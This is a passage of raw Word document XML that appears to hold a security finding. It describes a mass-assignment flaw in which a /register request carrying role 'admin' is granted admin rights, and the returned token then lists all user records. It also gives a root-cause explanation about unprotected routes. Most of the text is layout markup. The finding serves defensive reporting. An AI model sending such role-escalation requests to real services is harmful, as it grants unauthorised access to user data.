                                <w:t>username":"attacker</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>_...","</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>password":"password","role":"admin</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>", ...</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25443" name="Rectangle 25443"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3804277" y="326479"/>
                            <a:ext cx="72437" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0BFC824A"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431" name="Rectangle 431"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="669379"/>
                            <a:ext cx="2535278" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4F026311" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>→ 201 Created, role granted = admin</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="432" name="Rectangle 432"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="840829"/>
                            <a:ext cx="5142992" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="61C03420" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>→ GET /all-users with the returned token → 200, 5 user records returned</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="433" name="Rectangle 433"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1208996"/>
                            <a:ext cx="894668" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="01412CAF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t>Root cause.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="434" name="Rectangle 434"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="672703" y="1208996"/>
                            <a:ext cx="7373610" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2AEC01B6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> Two independent mistakes compounding. The route was never placed in a protected group — plausibly a</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="435" name="Rectangle 435"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1380446"/>
                            <a:ext cx="1804596" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="196ED6F3" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">scaffolding leftover, since </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="436" name="Shape 436"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1352550" y="1362075"/>
                            <a:ext cx="409575" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="409575" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="402680" y="0"/>
                                  <a:pt x="404925" y="930"/>
                                  <a:pt x="406785" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="408645" y="4648"/>
                                  <a:pt x="409575" y="6893"/>
                                  <a:pt x="409575" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="409575" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="409575" y="135979"/>
                                  <a:pt x="408645" y="138224"/>
                                  <a:pt x="406785" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="404925" y="141945"/>
                                  <a:pt x="402680" y="142875"/>
                                  <a:pt x="400050" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="464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37" name="Rectangle 437"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1383804" y="1385733"/>
                            <a:ext cx="465127" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3EF10EA7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>/</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>login</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="438" name="Rectangle 438"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1760488" y="1380446"/>
                            <a:ext cx="2184877" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6B804D9D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> legitimately belongs there and </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="439" name="Shape 439"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3400425" y="1362075"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4648"/>
                                  <a:pt x="581025" y="6893"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="135979"/>
                                  <a:pt x="580095" y="138224"/>
                                  <a:pt x="578235" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="141945"/>
                                  <a:pt x="574130" y="142875"/>
                                  <a:pt x="571500" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="464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40" name="Rectangle 440"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3430190" y="1385733"/>
                            <a:ext cx="697690" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="72A207E1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>/</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>register</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="441" name="Rectangle 441"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3981747" y="1380446"/>
                            <a:ext cx="2132082" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="412F2679" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> was written beside it. And the </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="442" name="Shape 442"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5581649" y="1362075"/>
                            <a:ext cx="285751" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285751" h="142875">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276226" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278856" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4648"/>
                                  <a:pt x="285750" y="6893"/>
                                  <a:pt x="285751" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285751" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135979"/>
                                  <a:pt x="284820" y="138224"/>
                                  <a:pt x="282960" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141945"/>
                                  <a:pt x="278856" y="142875"/>
                                  <a:pt x="276226" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="1" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4648"/>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443" name="Rectangle 443"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5611862" y="1385733"/>
                            <a:ext cx="310085" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="63012877" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>role</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="444" name="Rectangle 444"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5872014" y="1380446"/>
                            <a:ext cx="657976" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7362CAE7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> field was</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="546FEBB4" id="Group 25691" o:spid="_x0000_s1049" style="width:510.25pt;height:118.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,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&#10;AAQA8wAAAGAMAAAAAA==&#10;">
